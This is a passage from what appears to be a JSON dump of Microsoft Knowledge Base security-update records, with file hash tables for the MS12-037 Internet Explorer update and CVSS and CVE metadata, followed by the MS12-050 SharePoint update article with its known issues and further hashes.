class=\"sbody-td\">A07152D2384F3C927E2F004AD60609F362B152CC</td><td class=\"sbody-td\">6B43358A64DAD4443F9F2A99E7E6196862504F00D3F50852F9479FA4353853E2</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003.windowsxp-kb2699988-x64-cht.exe</td><td class=\"sbody-td\">36A6E4F3E77A2F0CBBD4EB56332F3437E35ABAD6</td><td class=\"sbody-td\">314ED06BCA772C28DB45F4242A12A0879EE04068EF2661DB07884464D394AAC0</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003.windowsxp-kb2699988-x64-enu.exe</td><td class=\"sbody-td\">C781F86FB6CDB7A38C70FCB36EB496812AAAFB36</td><td class=\"sbody-td\">916C3BE4E7FED7397E658D425D00A4436D81B69F2F552F03EC42AC750B6CB619</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003.windowsxp-kb2699988-x64-jpn.exe</td><td class=\"sbody-td\">680F5B978A9FE583E12358885700AB90B52E718B</td><td class=\"sbody-td\">15EB52836E07BD39842F59F63EEAE84C728DE24E572C27E2018C8B083FCE382E</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windows6.0-kb2699988-x64.msu</td><td class=\"sbody-td\">90F162A98D9FA5AF70B21A79216B8AC9AC18AC02</td><td class=\"sbody-td\">DB206FDF459DB0F02903A41388A578401A3E59EF9204BE4AC51B3808B1278557</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2699988-ia64-jpn.exe</td><td class=\"sbody-td\">044D96A548A7955777280B4AE6127EB688D2AAE6</td><td class=\"sbody-td\">54905D038CAC48EF0EC4454154809A12EDD7C98776B6718D533C843CCC25F85A</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windows6.1-kb2699988-x64.msu</td><td class=\"sbody-td\">EF4438C952B2EF46C90AD963097E94C6C7C1397E</td><td class=\"sbody-td\">A17B4D1BC6EE60684A98B7A93C6FBC87EE7AAA6691E7610498AAF516E6E7409B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie9-windows6.0-kb2699988-x64.msu</td><td class=\"sbody-td\">C366FA06288B975FF43661D2BD2B68589DDA3C4B</td><td class=\"sbody-td\">CE8859FB6AD173F1DE957B756D3FD9DB19A556A1BF1C536FA59C0E6A86B38A97</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie9-windows6.1-kb2699988-x64.msu</td><td class=\"sbody-td\">5E9BD26B8D993D64CD0EE8B352E4207305ABCEDB</td><td class=\"sbody-td\">06DDA505893EEBA66592CCB0CDA819FC09468540B79DE5661309BE4280913766</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003-kb2699988-x86-enu.exe</td><td class=\"sbody-td\">66EE6EA480E4126D2AE7BDB22C859B0DA86F8197</td><td class=\"sbody-td\">C5D2B28E604456CD0CC7ADC90D493844EE171754116B8D61A8844AC01DE5C03C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003-kb2699988-x86-trk.exe</td><td class=\"sbody-td\">58763032E00AB7569060059908CBE87F3BB15F79</td><td class=\"sbody-td\">1CEB696BB948A50D000BF7FE64B8F450EDC7A567F09B489896B403B7FAE3A8B2</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003-kb2699988-x86-sve.exe</td><td class=\"sbody-td\">32E33B7CB074F07A708C1909E2624B5D4DB5B9DB</td><td class=\"sbody-td\">C8F736140C4D13EAC05750CF2C547BE99435B9258A873B9E991C3F4C571FF3DA</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003-kb2699988-x86-ita.exe</td><td class=\"sbody-td\">163E6E6CE4ED4F188DA8AD01B322E8CD01890730</td><td class=\"sbody-td\">C93CD88822D018E33A6DB19A38DE02621F81F6EAE84D8FA87C0AD1C2C1640035</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003-kb2699988-x86-esn.exe</td><td class=\"sbody-td\">675E8EA8BE7553CD9B356B45A3E95A9A5A5D923E</td><td class=\"sbody-td\">1195EF4BC93807345132B68411EB528E3A3EF9808724A733E24A89F6AF116CF7</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003-kb2699988-x86-ptg.exe</td><td class=\"sbody-td\">7A113713B6A45E6F9FCC34110FC3B33FFFB85383</td><td class=\"sbody-td\">C8BF8FBFAD188CB4EA95DABC1C101CDF09410762B278F2005CC2B05201C9BE1E</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003-kb2699988-x86-cht.exe</td><td class=\"sbody-td\">19E54BDD358FBBE4BD6A295D0E0BA4A93823261F</td><td class=\"sbody-td\">415CA80DFFE01EEDF2DEEFA1267E521D35FFD43C58068875F519FF84945ACA57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003-kb2699988-x86-chs.exe</td><td class=\"sbody-td\">3DB7E2951BF981EA504AF81D931689605CF902C4</td><td class=\"sbody-td\">FC24D5CFB71ADAD51E9FA0C03369D35F4988CE7D177AA53EC93161A3F7B9FB16</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003-kb2699988-x86-kor.exe</td><td class=\"sbody-td\">0809AFCF5DD5AD4F798FE5B4509ADCB0402FA44D</td><td class=\"sbody-td\">42BF87A8D9F36DF245E9E1A4292847F961225037E91F48099ED447DD49946AFF</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003-kb2699988-x86-rus.exe</td><td class=\"sbody-td\">368FD918F0FD71D650187920AFFD527733C0DB49</td><td class=\"sbody-td\">410FCC4E76B0737B8EC93BFA8D024D41969BA1F884DC60B3621AF3DCF3F0EE86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003-kb2699988-x86-hun.exe</td><td class=\"sbody-td\">4C755DCFD9542690CE30FA1C1968D335E1C9A75C</td><td class=\"sbody-td\">8EFEDFF8B8F3FBD171420A3E41D293A3CD87B317E5B06DF8E4887F2720634F9F</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003.windowsxp-kb2699988-x64-deu.exe</td><td class=\"sbody-td\">AEA53C4D6A02093F9D5D651682B3CB579780B71D</td><td class=\"sbody-td\">11D4D77DA11D9623FA3907943FAD97E2C12DE4A29EB57E2F8C62A860A3FC526A</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003.windowsxp-kb2699988-x64-ptb.exe</td><td class=\"sbody-td\">C5DE9289C0AAEB011F70734C0F9DFF2D4FE7F1A2</td><td class=\"sbody-td\">DE0F0602E3721E42867A41A4091302780E3724B2A3014B4BD215651CC90610AC</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003.windowsxp-kb2699988-x64-fra.exe</td><td class=\"sbody-td\">028C6234805DC697C74AC87BF5E190BCFCC9DBBB</td><td class=\"sbody-td\">F542CBAD554C4AD231DE6EF0210DF7B9B5F00974A32F1C33F81240C1932544EB</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003.windowsxp-kb2699988-x64-cht.exe</td><td class=\"sbody-td\">8B4E63BA4900116D2227F88183FF494BC06E9D45</td><td class=\"sbody-td\">4090137752AD08F62916E2A6FA7C9E661FDB3537C14F785194B89AFC0FCB2334</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003.windowsxp-kb2699988-x64-esn.exe</td><td class=\"sbody-td\">107D9F72134E1FF575FAE9ED16B60B36647C25EB</td><td class=\"sbody-td\">4A1046C48D29A513334BE91B76D690E9718B9E2DE1CD16D65DB0B2E25046B608</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003.windowsxp-kb2699988-x64-rus.exe</td><td class=\"sbody-td\">6F2B39C9AF06A72E724241A719D06857BBFBAA8D</td><td class=\"sbody-td\">9A44D9A71188C5E4271EF8EEB14122BA6A425E99133738230F749CA960D4B48B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003.windowsxp-kb2699988-x64-chs.exe</td><td class=\"sbody-td\">B0D54D1DA00ACB42FB3C0FF81B8048B2BCD50AF4</td><td class=\"sbody-td\">F904BDD9E1269B6618D78261F932FA9B4266DA74D8D35AC936944529BF4087A9</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003.windowsxp-kb2699988-x64-kor.exe</td><td class=\"sbody-td\">BB9E3614A4A3E572F080469259B00C4B18876A91</td><td class=\"sbody-td\">0554173C3BA7F0B9B283DDB97491A5A005DA07939D5CB8596867CEA3BDE55C09</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003.windowsxp-kb2699988-x64-ita.exe</td><td class=\"sbody-td\">E980F6D8C67C815CB4A13F90FE9B95236C155D44</td><td class=\"sbody-td\">6725573CAE445A150E98817ADA75396AD5A87A932B8BF0F50E4A8FD50E41F7D0</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003-kb2699988-ia64-enu.exe</td><td class=\"sbody-td\">0184DDB117FBA7995BA952CBC13474CBF7960913</td><td class=\"sbody-td\">370A76B4AF1EDE8DFC7DEFF22FFF27A7D506A789F2E92FC98CB6F4A02F54BD9B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003-kb2699988-ia64-deu.exe</td><td class=\"sbody-td\">0FFB1E1F646FCD08168CA53FDE9FAD82F9870610</td><td class=\"sbody-td\">949C1CF4F4B7569BC58C62764295A1E3F0962C6DA0CD336BA1199B7F66AB5B26</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003-kb2699988-ia64-jpn.exe</td><td class=\"sbody-td\">E2D113A096E2EA9B8A743179CD2FD2FACF273C2B</td><td class=\"sbody-td\">E8BB0EB8F73DFA7B3A84A9869CBE69B9ECC942F4CB3BDB1EE26C99D1F4C26116</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003-kb2699988-ia64-fra.exe</td><td class=\"sbody-td\">F30CC7836C069322A5FB6FB044A0A44BE20B8209</td><td class=\"sbody-td\">A9FD42F7BBEC37C75172473795CC0B7D1A3A2946BE67689D69EEC31FD537E303</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-enu.exe</td><td class=\"sbody-td\">FF645B69FB06C8A18709B9840E0C7B0608BCFE04</td><td class=\"sbody-td\">223B5749BECBCADA6E4B4B6F39B5CEFF3F5D8429468077CC1DA219E27ED88573</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-ara.exe</td><td class=\"sbody-td\">B48AD2EA8AD544ADF1B769560B66D9C6681E03C1</td><td class=\"sbody-td\">EC1486C6E6F6B8F00C98AD584D5DA73B485E9362B6BC123667AB8992E26E25BF</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-cht.exe</td><td class=\"sbody-td\">F6042848D82ABD64A02446964EE7C665E7994A7B</td><td class=\"sbody-td\">B208D9E76562EFB04AD93B1C215AE72BE7A0D195F79579F6D3601AF09E2CA766</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-chs.exe</td><td class=\"sbody-td\">7583ED693D1938572073EE8393BD9330A6DC2B8A</td><td class=\"sbody-td\">49E1BF303EFB221E531300A4EF32A42533DEFC7B03FE89144FEE6AD8494A8603</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-ita.exe</td><td class=\"sbody-td\">6A880E2D1AEEBDDC921BBF97EC61CF3670A52CC0</td><td class=\"sbody-td\">A88C6B635C475BE0377FAC5E02E94A2035075E8DBED4A01DDBF568C5A97F58A2</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-kor.exe</td><td class=\"sbody-td\">5ED4D92C574800D725817E29E70676BFD890E959</td><td class=\"sbody-td\">7DBD1B8F44A620533EFAB48A7088BA71BB5A6FFCE084C15E950BA085F95376EB</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windows6.1-kb2699988-x86.msu</td><td class=\"sbody-td\">EFBD38FFFCBD41D42565FBB2B5C81A7C6D481702</td><td class=\"sbody-td\">941F302F5A001E8B3FF8C30D6432B52F904DC35144EB7A01BD2D6B6BB6D50F05</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-hun.exe</td><td class=\"sbody-td\">69FE2E4BDAB981ABEC1835920574F4232333A60C</td><td class=\"sbody-td\">1B6E95EB67518AB0A29E42C9CA865DB35F7D8AE928594002E39EE3DBCCB62D2D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-plk.exe</td><td class=\"sbody-td\">880BAA435CC75F813ED336F2A2CD79A47EE816DC</td><td class=\"sbody-td\">28F88822D3573C39DDC1840CC74FEFC7F25FBBB826DF7256AB9B2B486C32EE9C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-ara.exe</td><td class=\"sbody-td\">2DD679D6DD90B0E9DAAB849E8C0323F206387C58</td><td class=\"sbody-td\">95628E28AE52312CB60336D944C7450799323CB1EA7E9E1E049FCDF1F77D1404</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-cht.exe</td><td class=\"sbody-td\">19AE7498A0D539EEAA5E2A8F2D28277B22E856C8</td><td class=\"sbody-td\">D10912B18159C8B7F2020F45DBE151EDD1C6E4C993FDAFC2BBF50DDE0B61C365</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-deu.exe</td><td class=\"sbody-td\">1A76EA27842C198D817CFD55843015D0DE559DF6</td><td class=\"sbody-td\">D3BA1973BB786B482BBECA33C04349A017A7E4E8A060369AD7AF2DE73544B808</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windows6.0-kb2699988-x64-custom.msu</td><td class=\"sbody-td\">75684F371AFF3CF1447A8CFB1E216060CE4EC7C7</td><td class=\"sbody-td\">0FF51FB9C7F23B421945D9BFFC60B1BE931B98E268206352586B391DF0E3B607</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windows6.0-kb2699988-x86.msu</td><td class=\"sbody-td\">AA13BEE8A823317B7ACEB466607F367387B5BCD5</td><td class=\"sbody-td\">C68187086AD80289FB7382950C8C997F659C69BE65884E17D293182270058DBC</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windows6.0-kb2699988-x64.msu</td><td class=\"sbody-td\">FA89FAEA099735E482318B8140262F201D3905C8</td><td class=\"sbody-td\">46AF8E91EBBBCCEDA0783395792B1A0B13DB1DBAED84EEFDD0614F011D003AAB</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windows6.0-kb2699988-x64-custom.msu</td><td class=\"sbody-td\">98D65BE591213EA09F5F0175BDA8087D46C397DA</td><td class=\"sbody-td\">F6EB40B592B9CF69023258612F355B5EACE3EAB3FE24501E2DD04507BB97DC3D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windows6.0-kb2699988-x86-custom.msu</td><td class=\"sbody-td\">BF57BE47A45B77D4DC8B5400065870FD7A46A466</td><td class=\"sbody-td\">F167531A7F5DC8A5BD213D905E7168F0DB9649A2CCF44E819725A0023B902FD6</td></tr></table></div><h3 class=\"sbody-h3\">How to determine whether you are running a 32-bit or a 64-bit edition of Windows<br/></h3>If you are not sure which version of Windows that you are running or whether it is a 32-bit version or 64-bit version, open System Information (Msinfo32.exe), and review the value that is listed for <strong class=\"uiterm\">System Type</strong>. To do this, follow these steps:<br/><ol class=\"sbody-num_list\"><li>Click <strong class=\"uiterm\">Start</strong>, and then click <strong class=\"uiterm\">Run</strong>, or click <strong class=\"uiterm\">Start Search</strong>. </li><li>Type <strong class=\"uiterm\">msinfo32.exe</strong> and then press ENTER. </li><li>In <strong class=\"uiterm\">System Information</strong>, review the value for <strong class=\"uiterm\">System Type</strong>.<br/><ul class=\"sbody-free_list\"><li>For 32-bit editions of Windows, the <strong class=\"uiterm\">System Type</strong> value is <strong class=\"uiterm\">x86-based PC</strong>. </li><li>For 64-bit editions of Windows, the <strong class=\"uiterm\">System Type</strong> value is <strong class=\"uiterm\">x64-based PC</strong>. </li></ul></li></ol><span>For more information about how to determine whether you are running a 32-bit or 64-bit edition of Windows, click the following article number to view the article in the Microsoft Knowledge Base:<br/><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/827218\" id=\"kb-link-27\">827218 </a>How to determine whether a computer is running a 32-bit version or a 64-bit version of the Windows operating system<br/></div></span></div></body></html>", "edition": 2, "cvss3": {}, "published": "2012-06-12T00:00:00", "type": "mskb", "title": "MS12-037: Cumulative Security Update for Internet Explorer: June 12, 2012", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1876", "CVE-2012-1875", "CVE-2012-1880", "CVE-2012-1872", "CVE-2012-1881", "CVE-2012-1858", "CVE-2012-1878", "CVE-2012-1523", "CVE-2012-1882", "CVE-2012-1879", "CVE-2012-1874", "CVE-2012-1873", "CVE-2012-1877"], "modified": "2012-07-11T22:57:36", "id": "KB2699988", "href": "https://support.microsoft.com/en-us/help/2699988/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T22:39:07", "description": "<html><body><p>Describes vulnerabilities in SharePoint could allow elevation of privilege, and was released on July 10, 2012.</p><h2>INTRODUCTION</h2><div class=\"kb-summary-section section\">Microsoft has released security bulletin MS12-050. To view the complete security bulletin, go to one of the following Microsoft websites:\u00a0<ul class=\"sbody-free_list\"><li>Home users:<div class=\"indent\"><a href=\"http://www.microsoft.com/security/pc-security/bulletins/201207.aspx\" id=\"kb-link-1\" target=\"_self\">http://www.microsoft.com/security/pc-security/bulletins/201207.aspx</a></div><span class=\"text-base\">Skip the details</span>: Download the updates for your home computer or laptop from the Microsoft Update website now:<br/><div class=\"indent\"><a href=\"http://update.microsoft.com/microsoftupdate/\" id=\"kb-link-2\" target=\"_self\">http://update.microsoft.com/microsoftupdate/</a></div></li><li>IT professionals:<div class=\"indent\"><a href=\"http://technet.microsoft.com/security/bulletin/ms12-050\" id=\"kb-link-3\" target=\"_self\">http://technet.microsoft.com/security/bulletin/MS12-050</a></div></li></ul><h3 class=\"sbody-h3\">How to obtain help and support for this security update</h3> Help installing updates: <a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-4\" target=\"_self\">Support for Microsoft Update</a><br/><br/>Security solutions for IT professionals: <br/><a href=\"http://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-5\" target=\"_self\">TechNet Security Troubleshooting and Support</a><br/><br/>Help protect your computer that is running Windows from viruses and malware:<br/><a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-6\" target=\"_self\">Virus Solution and Security Center</a><br/><br/>Local support according to your country: <br/><a href=\"https://support.microsoft.com/common/international.aspx\" id=\"kb-link-7\" target=\"_self\">International Support</a><br/><br/></div><h2></h2><div class=\"kb-moreinformation-section section\"><h4 class=\"sbody-h4\">Known issues and additional information about this security update</h4> <br/> <br/><br/> The following articles contain additional information about this security update as it relates to individual product versions. The articles may contain known issue information. If this is the case, the known issue is listed below each article link.<ul class=\"sbody-free_list\"><li><a href=\"https://support.microsoft.com/en-us/help/2553194\" id=\"kb-link-8\">2553194 </a> MS12-050: Description of the security update for SharePoint Server 2010 (coreserverloc): July 10, 2012<br/><br/>Known issues in security update 2553194: <br/><ul class=\"sbody-free_list\"><li>After you install this security update on all SharePoint servers, you have to run the PSconfig tool to complete the installation. For more information about how to use the PSconfig tool, go to the following TechNet webpage:<div class=\"indent\"><a href=\"http://technet.microsoft.com/en-us/library/cc263093.aspx\" id=\"kb-link-9\" target=\"_self\">PSconfig command-line reference (SharePoint Server 2010)</a></div></li></ul></li><li><a href=\"https://support.microsoft.com/en-us/help/2553322\" id=\"kb-link-10\">2553322 </a> MS12-050: Description of the security update for InfoPath 2010: July 10, 2012 </li><li><a href=\"https://support.microsoft.com/en-us/help/2553365\" id=\"kb-link-11\">2553365 </a> MS12-050: Description of the security update for SharePoint Foundation 2010: July 10, 2012<br/><br/>Known issues in security update 2553365: <ul class=\"sbody-free_list\"><li>After you install this security update on all SharePoint servers, you have to run the PSconfig tool to complete the installation. For more information about how to use the PSconfig tool, go to the following TechNet webpage:\u00a0<div class=\"indent\"><a href=\"http://technet.microsoft.com/en-us/library/cc263093.aspx\" id=\"kb-link-12\" target=\"_self\">PSconfig command-line reference (SharePoint Server 2010)</a></div></li></ul></li><li><a href=\"https://support.microsoft.com/en-us/help/2553424\" id=\"kb-link-13\">2553424 </a> MS12-050: Description of the security update for SharePoint Server 2010 (wosrv): July 10, 2012<br/><br/>Known issues in security update 2553424: <ul class=\"sbody-free_list\"><li>After you install this security update on all SharePoint servers, you have to run the PSconfig tool to complete the installation. For more information about how to use the PSconfig tool, go to the following TechNet webpage:\u00a0<div class=\"indent\"><a href=\"http://technet.microsoft.com/en-us/library/cc263093.aspx\" id=\"kb-link-14\" target=\"_self\">PSconfig command-line reference (SharePoint Server 2010)</a></div></li></ul></li><li><a href=\"https://support.microsoft.com/en-us/help/2553431\" id=\"kb-link-15\">2553431 </a> MS12-050: Description of the security update for InfoPath 2010: July 10, 2012<br/><br/>Known issues in security update 2553431: <ul class=\"sbody-free_list\"><li>Windows Update will offer this security update to all systems that are running InfoPath 2010. However, the security update is required only for systems that are running Visual Studio Tool for Applications (VSTA). This security update can be installed on any system that is running InfoPath 2010. However, binaries are updated only on systems that are running VSTA.<br/><br/><span class=\"text-base\">Note </span>If you install this security update on a system that is running InfoPath 2010 without VSTA and then you install VSTA, you do not have to reinstall this security update.</li></ul></li><li><a href=\"https://support.microsoft.com/en-us/help/2589325\" id=\"kb-link-16\">2589325 </a> MS12-050: Description of the security update for Groove Server 2010: July 10, 2012<br/><br/>Known issues in security update 2589325: <ul class=\"sbody-free_list\"><li>If you install any previously released Groove server update before you install this security update, then you may see multiple entries for this security update may appear in <strong class=\"uiterm\">Add or Remove Programs</strong>.</li><li>The Groove security update does not appear in <span class=\"sbody-userinput\">Add or Remove Programs</span>. To determine whether the update is installed, the system administrator can open the SharePoint Configuration Manager console.</li></ul></li><li><a href=\"https://support.microsoft.com/en-us/help/2596663\" id=\"kb-link-17\">2596663 </a> MS12-050: Description of the security update for SharePoint Server 2007 Service Pack 2 (coreserver): July 10, 2012</li><li><a href=\"https://support.microsoft.com/en-us/help/2596666\" id=\"kb-link-18\">2596666 </a> MS12-050: Description of the security update for InfoPath 2007: July 10, 2012<br/><br/>Known issues in security update 2596666: <ul class=\"sbody-free_list\"><li>Windows Update will offer this security update to all systems that are running InfoPath 2010. However, the security update is required only for systems that are running Visual Studio Tool for Applications (VSTA). This security update can be installed on any system that is running InfoPath 2010. However, binaries are updated only on systems that are running VSTA.<br/><br/><span class=\"text-base\">Note </span>If you install this security update on a system that is running InfoPath 2010 without VSTA and then you install VSTA, you do not have to reinstall this security update.</li></ul></li><li><a href=\"https://support.microsoft.com/en-us/help/2596786\" id=\"kb-link-19\">2596786 </a> MS12-050: Description of the security update for InfoPath 2007 (IPEditor): July 10, 2012<br/><br/>Known issues in security update 2596786: <ul class=\"sbody-free_list\"><li>Windows Update will offer this security update to all systems that are running InfoPath 2010. However, the security update is required only for systems that are running Visual Studio Tool for Applications (VSTA). This security update can be installed on any system that is running InfoPath 2010. However, binaries are updated only on systems that are running VSTA.<br/><br/><span class=\"text-base\">Note </span>If you install this security update on a system that is running InfoPath 2010 without VSTA and then you install VSTA, you do not have to reinstall this security update.</li></ul></li><li><a href=\"https://support.microsoft.com/en-us/help/2596911\" id=\"kb-link-20\">2596911 </a> MS12-050: Description of the security update for Windows SharePoint Services 3.0: July 10, 2012</li><li><a href=\"https://support.microsoft.com/en-us/help/2596942\" id=\"kb-link-21\">2596942 </a> MS12-050: Description of the security update for Office SharePoint Server 2007 Service Pack 2 (xlsrvwfe): July 10, 2012</li><li><a href=\"https://support.microsoft.com/en-us/help/2598239\" id=\"kb-link-22\">2598239 </a> MS12-050: Description of the security update for SharePoint Server 2010: July 10, 2012<br/><br/>Known issues in security update 2598239: <ul class=\"sbody-free_list\"><li>After you install this security update on all SharePoint servers, you have to run the PSconfig tool to complete the installation. For more information about how to use the PSconfig tool, go to the following TechNet webpage:\u00a0<div class=\"indent\"><a href=\"http://technet.microsoft.com/en-us/library/cc263093.aspx\" id=\"kb-link-23\" target=\"_self\">PSconfig command-line reference (SharePoint Server 2010)</a></div></li></ul></li><li><a href=\"https://support.microsoft.com/en-us/help/2760604\" id=\"kb-link-24\">2760604 </a> MS12-050: Description of the security update for Microsoft Windows SharePoint Services 2.0 SP3: December 11, 2012</li></ul><span></span><br/><h4 class=\"sbody-h4\">File hash information</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">SHA1 hash</th><th class=\"sbody-th\">SHA256 hash</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">wss2003-kb2760604-fullfile-ara.exe</td><td class=\"sbody-td\">944FFC7C1BCC35C796EE1CAEC3D977EA23BE3591</td><td class=\"sbody-td\">5736A05A0858EB07A8239C60593A4D6BD230BA54A3E16274A0773D93EE930570</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">wss2003-kb2760604-fullfile-bgr.exe</td><td class=\"sbody-td\">1EF35C81A8B2DF79AD99682D0984731216264B4B</td><td class=\"sbody-td\">45539094870B351DE90768D3E3156E0A825C7F371B415E75E64D405314030139</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">wss2003-kb2760604-fullfile-chs.exe</td><td class=\"sbody-td\">F11BB8837A560E4A0BC424D95BEC68E9D74AE377</td><td class=\"sbody-td\">F869A0A164A91A014D2AB1A7492F25363FD6CBFB83F8E4D44E3FFAC96C496D31</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">wss2003-kb2760604-fullfile-cht.exe</td><td class=\"sbody-td\">970CF05CCF910C9FF0431DCFC85F085F977AF542</td><td class=\"sbody-td\">22F3DC70AB127BB881DC166CDD771291EE833C7DA207482FEF84D11E0F3A8156</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">wss2003-kb2760604-fullfile-csy.exe</td><td class=\"sbody-td\">F49D9534D20C6E8F23C53FB8D226446C8D9EC441</td><td class=\"sbody-td\">18CB0ABCB54DC278D8C314B778999A5AED34948922C3DC9B0E512E0D0F9EEE77</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">wss2003-kb2760604-fullfile-dan.exe</td><td class=\"sbody-td\">19FA51E5995EA5EA3EAE16C540BF82550CE107E3</td><td class=\"sbody-td\">0D61FF387EE6507D2840F149A5063DD2C597E21DFF70F8F7AA960B65D36CBB5D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">wss2003-kb2760604-fullfile-deu.exe</td><td class=\"sbody-td\">4D81FFAC740D198A7B66DA296EF9427F9B11CFA2</td><td class=\"sbody-td\">C17A570B8E850D10000BBC4BBA14D6B78C03F267AA6FB169D0E4DF3B5656161F</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">wss2003-kb2760604-fullfile-ell.exe</td><td class=\"sbody-td\">03973E73A4AB0E7F0B72D478B61538764AE5E547</td><td class=\"sbody-td\">485CD52BB0B9930C63530F38B7917E6774F548D26766CA40ECAF61377B5945A9</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">wss2003-kb2760604-fullfile-enu.exe</td><td class=\"sbody-td\">8CDCE452A26ECC14A0BBBFA80B43CE48F224A6CA</td><td class=\"sbody-td\">2C21C95770D60BA08EBDA7965BC38625E20684BAB4E43E37C70673E133BF9F4F</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">wss2003-kb2760604-fullfile-esn.exe</td><td class=\"sbody-td\">FA1B8FE9E815E75E3BD2F24C0C9E559A9E20B4C0</td><td class=\"sbody-td\">0C71F483FE72EAD5BE870EA1A8E9DC60C369FC5FC33733D0D02C629C3E7FF731</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">wss2003-kb2760604-fullfile-eti.exe</td><td class=\"sbody-td\">044DA3C7C9A238869D124D697DBEC06B4EA257C3</td><td class=\"sbody-td\">D6755EB7FD5E195A9CD2ADA1E5CA937A2B365AC6DB91AA4342AF4D2818E35D69</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">wss2003-kb2760604-fullfile-fin.exe</td><td class=\"sbody-td\">1867C849389450286FEE99C95CD881DA9CFFB708</td><td class=\"sbody-td\">8866AD99D8D83DE3271366399BD1B7998257E15E39A82ED0CB2C9E1DCC6AA943</td></tr><tr class=\"sbody-tr\"><td 